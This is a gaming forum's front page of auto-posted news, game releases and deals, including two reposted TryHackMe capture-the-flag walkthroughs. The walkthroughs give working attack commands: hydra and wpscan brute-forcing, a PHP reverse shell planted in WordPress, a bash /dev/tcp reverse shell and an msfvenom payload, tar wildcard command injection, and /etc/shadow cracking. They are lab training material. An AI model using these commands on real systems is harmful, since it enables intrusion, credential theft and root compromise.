Create an account


Welcome, Guest
You have to register before you can post on our site.

Username
  

Password
  





Search Forums

(Advanced Search)

Forum Statistics
» Members: 20,113
» Latest member: ronocik711
» Forum threads: 21,793
» Forum posts: 22,659

Full Statistics

Online Users
There are currently 626 online users.
» 0 Member(s) | 621 Guest(s)
Applebot, Baidu, Bing, Google, Yandex

 
  News - Witcher TV Show Deepfake Puts Liam Hemsworth's Face On Henry Cavill
Posted by: xSicKxBot - 02-19-2023, 01:24 PM - Forum: Lounge - No Replies

Witcher TV Show Deepfake Puts Liam Hemsworth's Face On Henry Cavill

A VFX artist has created a fake trailer for Netflix's The Witcher season 4, which replaces Henry Cavill's Geralt of Rivia with his soon-to-be replacement, Liam Hemsworth.

The deepfake video was created by Matthew Anthony--via Eurogamer--and gives fans of the series a look at what Hemsworth could look like as the Butcher of Blavikin instead of Cavill, who has played the character for two seasons and a third yet to arrive. The two-minute deepfake depicts the actor's face digitally imposed over Cavill's in a variety of scenes taken from the Netflix series. For example, moments where he's simply talking and interacting with characters such as Jaskier and Ciri.

However, scenes with complicated fight scenes performed by Cavill are not featured in the deepfake, so fans won't know what Hemsworth could look like wielding a sword until season 4 eventually drops. The VFX artist has developed a collection of videos using deepfake technology, and even created a concept where Ben Affleck would play Geralt as well.

Continue Reading at GameSpot

https://www.gamespot.com/articles/witche...01-10abi2f

Print this item

  PC - Souls of Chronos
Posted by: xSicKxBot - 02-19-2023, 01:24 PM - Forum: New Game Releases - No Replies

Souls of Chronos



Fifteen years after the catastrophic event known as the "Apocalypse", the world is still in an era of great unrest. Even Astella, a harbour town far from the centre of the Vallois Empire, is no exception. Local gangs, slum dwellers, external forces, and secret societies - all these factions are clashing together over their own agenda and interests. Under such tension, the fragile peace here at Astella is on the verge of sliding back into all-out conflicts.

In the midst of this crisis, a young boy and a young girl crossed paths. In the nick of the time, Sid, facing his impending death as a result of a series of unfortunate events, was luckily saved by a girl, Torii, who wields a special power - Chrono.

In order to investigate an unusual crime, Sid and Torii together embark on a journey heading into the greater unknown. In this intricate intertwining of events, every decision made could shape the future of Astella.

Publisher: Astrolabe Games

Release Date: Feb 13, 2023




https://www.metacritic.com/game/pc/souls-of-chronos

Print this item

  [Oracle Blog] The TLS and Java Card story for IoT and more
Posted by: xSicKxBot - 02-18-2023, 08:53 AM - Forum: Java Language, JVM, and the JRE - No Replies

The TLS and Java Card story for IoT and more

I always hear that when the TLS protocol is used between a client and a server then everything is secure to exchange data in between the two !


https://blogs.oracle.com/java/post/the-t...t-and-more

Print this item

  [Tut] TryHackMe – How I Used WPScan to Extract Login Credentials (WordPress)
Posted by: xSicKxBot - 02-18-2023, 08:53 AM - Forum: Python - No Replies

TryHackMe – How I Used WPScan to Extract Login Credentials (WordPress)

5/5 – (1 vote)

CHALLENGE OVERVIEW


YouTube Video

BACKGROUND



This CTF challenge is another blackbox-style pentest where we don’t know anything about our target other than the IP address.

We will have to discover ports and services running on the server with our standard pentesting tools like nmap and dirb scan. We also don’t have any inside information about the backend of the target machine.

Let’s get started!


We’ll be testing out the website pentest.ws during today’s video walkthrough.

It is a site designed for pentesters to keep track of their enumeration and credentials. The paid version also helps pentesters create professional VAPT reports (vulnerability assessment and penetration testing reports).

At the end of this post, I will summarize my thoughts on using pentest.ws for the first time.

ENUMERATION/RECON



sudo nmap -A -oX nmap.txt $targetIP -p-

Today we are exporting our nmap results in XML format so that we can upload them to pentest.ws and have the site automatically parse our findings.

dirb http://$targetIP -o dirb.txt

We discovered a WordPress login at: http://internal.thm/blog/wp-login.php

USING WPSCAN TO EXTRACT WORDPRESS LOGIN CREDENTIALS


Let’s use wpscan to discover the admin’s email and password for WordPress.

wpscan --url 10.10.61.252/blog -e vpn,u -o wpscan.txt

Now that we found a username, we can run wpscan again with a wordlist to brute-force the password.

wpscan --url 10.10.61.262/blog --usernames admin --passwords /home/kalisurfer/hacking-tools/rockyou.txt --max-threads 50 -o wpscan-passwds.txt

We found the admin email and password!

admin:my2boys

Now we can log into WordPress and look for a place to upload a revshell.

INITIAL FOOTHOLD – SPAWN A REVSHELL BY EDITING 404.PHP



We’ll edit the template for 404.php and drop in a revshell created quickly and easily with EzpzShell.py.

If you want to learn more about ezpzshell, check out my previous blog post:

? Learn More: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation

ezpz 10.6.2.23 8888 php (ezpzshell also automatically starts a listener)


After copying the payload to 404.php, we make sure it is saved and then trigger the payload:

http://internal.thm/wordpress/wp-content...en/404.php

And if everything is set up correctly, we will catch the revshell with ezpz as user: www-data.


STABILIZE THE SHELL



The following command will stabilize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

INTERNAL ENUMERATION – FIND USER CREDS


We discover a txt file with credentials:

cat wp-save.txt Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb13guM!@#123

Let’s try switching users to aubreanna with the password given in wp-save.txt.

su aubreanna

We are in as user aubreanna and immediately find the user flag.

aubreanna@internal:~$ cat us cat user.txt THM{i—------omitted--------1}

MORE ENUMERATION – DISCOVER A JENKINS SERVICE


cat jenkins.txt Internal Jenkins service is running on 172.17.0.2:8080

SET UP PORT FORWARDING VIA SSH LOGIN



ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.61.252

SUCCESS! WE’VE CONNECTED UP TO JENKINS VIA SSH PORT FORWARDING! We can now open the Jenkins login page in our browser.


BRUTE-FORCE THE LOGIN



hydra -l admin -P /home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou-75.txt -s 8080 127.0.0.1 http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password'

The payload on this command has three parts:

  1. http-post-form + header
  2. the request, edited with admin as the username and ^PASS^ in place of the password to mark it as the variable for the password wordlist
  3. the error message that the website will return with a wrong password 

Output:

Using burpsuite or developer mode on firefox will allow us to extract these strings and modify it to our final hydra payload.
Hydra v9.1 © 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
\
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-06 08:57:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 59185 login tries (l:1/p:59185), ~3700 tries per task
[DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password
[STATUS] 396.00 tries/min, 396 tries in 00:01h, 58789 to do in 02:29h, 16 active
[8080][http-post-form] host: 127.0.0.1 login: admin password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-06 08:58:10

Credentials found! admin:spongebob

ENUMERATING JENKINS AS ADMIN


We’ll use the script console on Jenkins to spawn another revshell using groovy scripting language.

We’ll use ezpzshell and choose the Java code, because groovy is built on Java. This time when we catch it, we will be user jenkins.

Manually enumerating through the file system we stumble across a note.txt. Let’s check out the contents:

cat note.txt

Output:

Aubreanna, Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account. root:tr0ub13guM!@#123

Bingo! We found root user credentials!

SWITCH USERS TO ROOT


su root
root@internal:~# cat root.txt
THM{d—-omitted—3r}

FINAL THOUGHTS



I’m not convinced yet that pentest.ws will save me much time on my note taking. Maybe with time and experience it would help.

I think the report features that are available for paying subscribers might be just helpful enough to keep me using their platform.

However, I have concerns about security of their platform, as findings from pentesting can be sensitive and generally include login credentials and other passwords.

Overall, I enjoyed the challenge of this box, especially the part where we set up port forwarding via SSH login to expose the Jenkins login portal to our attack machine.

? Recommended: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation



https://www.sickgaming.net/blog/2023/02/...wordpress/

Print this item

  (Indie Deal) Cashback, Vorax AMA Stream, Yugi, Red Diamond Bundle
Posted by: xSicKxBot - 02-18-2023, 08:53 AM - Forum: Deals or Specials - No Replies

Cashback, Vorax AMA Stream, Yugi, Red Diamond Bundle

Romantic Cashback Sale
[www.indiegala.com]
Share your love & hugs with your significant other. Even if you do not have one yet, please remember that you are significant to us, that's why we like giving back...cashback for every purchase for a limited time. You are all adorable, that's why we brought to you a FREEbie with your name on it.

[discord.gg]
If you join the Vorax Discord Channel you may also join us for a Q&A at February 17, 2023 8:00 PM Rome Time in #ask-me-anything. ( on Saturday and Sunday same time)

Red Diamond Bundle | 12 Adult Steam Games | 91% OFF
[www.indiegala.com]
Shining bright like a diamond, this adult 18+ collection filled with some hot indie gems are ready to be discovered.

https://www.youtube.com/watch?v=0iNGNYuR5_8
New Sales ending in a few days
[www.indiegala.com]
https://www.youtube.com/watch?v=POMAhPnXEXU



https://steamcommunity.com/groups/indieg...5468386354

Print this item

  (Free Game Key) Biing Sex Intrigue and Scalpels - Free GOG Game
Posted by: xSicKxBot - 02-18-2023, 08:53 AM - Forum: Deals or Specials - No Replies

Biing Sex Intrigue and Scalpels - Free GOG Game

Biing Sex Intrigue and Scalpels - Free GOG Game

This giveaway is on gog.com gog is a platform for games that is dedicated to drm-free games (those are games that do not require login or registration to play the game)

How to grab Biing Sex Intrigue and Scalpels
- Go to the home page of https://www.gog.com/#giveaway
- Login and Register
- Go to the home page again
- Wait for 10 seconds then start searching for Alien Breed Trilogy
- on the home page look for "Deal of the Day" (above it there should be a banner)
- on the banner there is a button "Yes, and claim the game" click it
- That's it


?GrabFreeGames.com ?Twitter ?Steam Curator ?Facebook[fb.me]?Discord[discord.gg]
❤️Support us: HumbleBundle Partner[www.humblebundle.com] Fanatical Affiliate[www.fanatical.com]


https://steamcommunity.com/groups/GrabFr...6490427795

Print this item

  PC - Returnal
Posted by: xSicKxBot - 02-18-2023, 08:53 AM - Forum: New Game Releases - No Replies

Returnal



After crash-landing on this shape-shifting world, Selene must search through the barren landscape of an ancient civilization for her escape. Isolated and alone, she finds herself fighting tooth and nail for survival. Again and again, she's defeated forced to restart her journey every time she dies.

Through relentless roguelike gameplay, you'll discover that just as the planet changes with every cycle, so do the items at your disposal. Every loop offers new combinations, forcing you to push your boundaries and approach combat with a different strategy each time.

Brought to life by stunning visual effects, the dark beauty of the decaying world around you is packed with explosive surprises. From high stakes, bullet hell-fuelled combat, to visceral twists and turns through stark and contrasting environments. You'll explore, discover and fight your way through an unforgiving journey, where mystery stalks your every move.

Publisher: Sony Interactive Entertainment

Release Date: Feb 15, 2023




https://www.metacritic.com/game/pc/returnal

Print this item

  [Oracle Blog] JCF Webinar series 2022 - 25 years we sow
Posted by: xSicKxBot - 02-17-2023, 12:55 PM - Forum: Java Language, JVM, and the JRE - No Replies

JCF Webinar series 2022 - 25 years we sow

2022 is special ! This is the 25 years anniversary of Java Card as already reflected in a previous post where experts detail the history and the reasons of its success story. How the Java card technology is so pervasive in our lives ?


https://blogs.oracle.com/java/post/jcf-w...ars-we-sow

Print this item

  [Tut] TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (1/2)
Posted by: xSicKxBot - 02-17-2023, 12:55 PM - Forum: Python - No Replies

TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (1/2)

5/5 – (1 vote)

CHALLENGE OVERVIEW


YouTube Video

  • CTF Creator: Tib3rius
  • Link: https://tryhackme.com/room/linuxprivesc
  • Difficulty: medium
  • Target: gaining root access using a variety of different techniques
  • Highlight: Quickly gaining root access on a Linux computer in many different ways
  • Tags: privesc, linux, privilege escalation

BACKGROUND



Using different exploits to compromise operating systems can feel like magic (when they work!).

In this walkthrough, you will see various “magical” ways that Linux systems can be rooted. These methods rely on the Linux system having misconfigurations that allow various read/write/execute permissions on files that should be better protected. In this post, we will cover tasks 1-10.

TASK 1 Deploy the Vulnerable Debian VM


After connecting to our TryHackMe VPN, let’s start our notes.txt file and write down our IPs in an export fashion.

export targetIP=10.10.63.231
export myIP=10.6.2.23

Now we can go ahead and log in via SSH using the starting credentials given in the instructions:

ssh user@10.10.63.231
id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)

Now that we are in via SSH, let’s start exploiting this machine!

TASK 2 Service Exploits



In this task, we will privesc by exploiting MySQL using https://www.exploit-db.com/exploits/1518

We’ll create a new file named rootbash that spawns a root shell. This box has the exploit preloaded, so all we have to do is cut and paste the commands from this section to try out the privesc.


Task 3: Weak File Permissions – Readable /etc/shadow


In this task, we will read /etc/shadow and crack the hash with John the Ripper.

First, we need to save the root entry from /etc/shadow file as hash.txt.


Next, let’s load up John and crack the hash with rockyou.txt as our wordlist

john --wordlist=</PATH/TO/>rockyou.txt hash.txt

We have found our root password, password123!

TASK 4: Weak File Permissions – Writeable /etc/shadow



In this task, we will change the root password in /etc/shadow file.

mkpasswd -m sha-512 newpasswordhere
$6$pz5mE.wYesKIYGN$jyRHWFXauy1tWmXLWABRKFjUplUH4u7w2YvxEysk5OPcS.HcgBoQkYt66gkkuMB6EKK8WUh1CY.BAO2mdOdPb.

user@debian:~/tools/mysql-udf$ nano /etc/shadow
user@debian:~/tools/mysql-udf$ su root
Password: root@debian:/home/user/tools/mysql-udf#

TASK 5 Weak File Permissions – Writeable /etc/passwd


In this task, we will change the root passwd in /etc/passwd. First we need to generate a new hashed password: 

openssl passwd newpasswordhere

TASK 6 Sudo – Shell Escape Sequences



Let’s check our sudo privileges:

sudo -l

We can choose any of the many bin files that we have sudo permissions on, except for the apache2 bin that doesn’t have a sudo exploit listed on GTFObins

Today we’ll choose to run the exploit utilizing the more bin file.

? Link: https://gtfobins.github.io/gtfobins/more/

Running the following two commands gives us a root shell:

TERM= sudo more /etc/profile
!/bin/sh

TASK 7 Sudo – Environment Variables


Method 1: preload file spoofing


gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so more

Method 2: shared object spoofing


ldd /usr/sbin/apache2
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp apache2

TASK 8 Cron Jobs – File Permissions



In this task, we will root the Linux box by changing the file overwrite.sh that is scheduled to run automatically every minute on cron jobs.

Because we have to write file permissions on the file, we can change the contents to spawn a revshell that we can catch on a listener. The file is owned by root, so it will spawn a root shell.

Overwrite the file with the following:

#!/bin/bash
bash -i >& /dev/tcp/10.6.2.23/8888 0>&1

Now, all we need to do is start a netcat listener and wait for a maximum of 1 minute to catch the revshell.

nc -lnvp 8888

TASK 9 Cron Jobs – PATH Environment Variable


In this task, we will hijack the PATH environment variable by creating an overwrite.sh file in /home/user directory.

user@debian:~$ cat overwrite.sh #!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

This bash script will copy /bin/bash (the shell) to the tmp directory, then add execute privileges and an suid bit. After the overwrite.sh file runs, we can manually activate the root shell by running the new file “rootbash” with persistence mode.

user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
rootbash-4.1# exit

TASK 10 Cron Jobs – Wildcards



In this exploit, we will use strange filenames to trick the system into thinking they are checkpoint flags on the tarball command which issue a command to run the elf shell to give us a root shell on our netcat listener. 

First, let’s create a new payload for a revshell

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f elf -o shell.elf

Next, we’ll transfer the elf file to /home/usr on the target via a simple HTTP server. Finally, we need to create two empty files with the following names:

touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf

Finally, we’ll need to start up a netcat listener to catch the root shell.

nc -lnvp 8888


POST-EXPLOITATION


Let’s remove the shell and the other two spoofed empty command extension files.

rm /home/user/shell.elf
rm /home/user/--checkpoint=1
rm /home/user/--checkpoint-action=exec=shell.elf

FINAL THOUGHTS



Magic isn’t actually needed to carry out any of the privesc methods outlined in this post.

As long as the target machine has a misconfiguration on password files (/etc/shadow and/or /etc/passwd), cron jobs are set to run files that we can modify or spoof, or a PATH variable that we can hijack with a spoof file, we can easily escalate privileges to the root user.

Thanks for reading this write-up, and be sure to check out part II for more “magical” privesc methods.



https://www.sickgaming.net/blog/2023/02/...ation-1-2/

Print this item

  (Indie Deal) Vorax Open Alpha is LIVE! Play Now!
Posted by: xSicKxBot - 02-17-2023, 12:54 PM - Forum: Deals or Specials - No Replies

Vorax Open Alpha is LIVE! Play Now!

[freebies.indiegala.com]
Hello, Mercenaries,

Thank you so much for heeding our call. We are in need of fresh soldiers to be dropped into the island to investigate strange anomalies coming from a strange patogen.

Open Alpha will be available both Steam and on the IndieGala website/client.
https://store.steampowered.com/app/1874190/Vorax/

What to Expect in the Open Alpha

More Tools & Weapons
In this vast and difficult land, you must survive through creative ways. Utilize the chainsaw, hatchet and bow and arrow to succeed.

Traps
Incendiary, explosives, and tripwires have been added to your crafting arsenal as additional means of protection or for whichever purpose you may see fit.

Wood Piling and Crafting
Wood is a vital component for protection and survival if used correctly. Cut, chop, farm, gather, all in the hopes to see another day. Our new improvements to wood piling should lend you a hand..

…And More
We have added multiple features, monsters, and locations for exploration. If you would like more information about these updates please visit our Steam Page.

Current version is 0.4.1069. Read more about our progress in our Dev Update Announcements.

You may even support the development via purchasing an early copy[vorax.indiegala.com].

Wishlist now:
https://store.steampowered.com/app/1874190/Vorax/
[discord.gg]





https://steamcommunity.com/groups/indieg...5464047576

Print this item

 
Latest Threads
Shopback Referral Code → ...
Last Post: ronocik711
1 hour ago
["UniQue"] Mexico TEMU Co...
Last Post: ronocik711
1 hour ago
Forza Horizon 5 Game Save...
Last Post: poxah56770
2 hours ago
Secure Your First Apollo ...
Last Post: KALYANI1x
3 hours ago
Save Big During Apollo Ne...
Last Post: KALYANI1x
3 hours ago
Apollo Neuro Coupon Code ...
Last Post: jax9090mm
3 hours ago
[Latest] Temu Coupon Code...
Last Post: codestar99
3 hours ago
Apollo Neuro Discount Cod...
Last Post: jax9090mm
3 hours ago
Experience Better Tech Ap...
Last Post: KALYANI1x
3 hours ago
Temu Deutschland Gutschei...
Last Post: Benbeckman5
3 hours ago

Forum software by © MyBB Theme © iAndrew 2016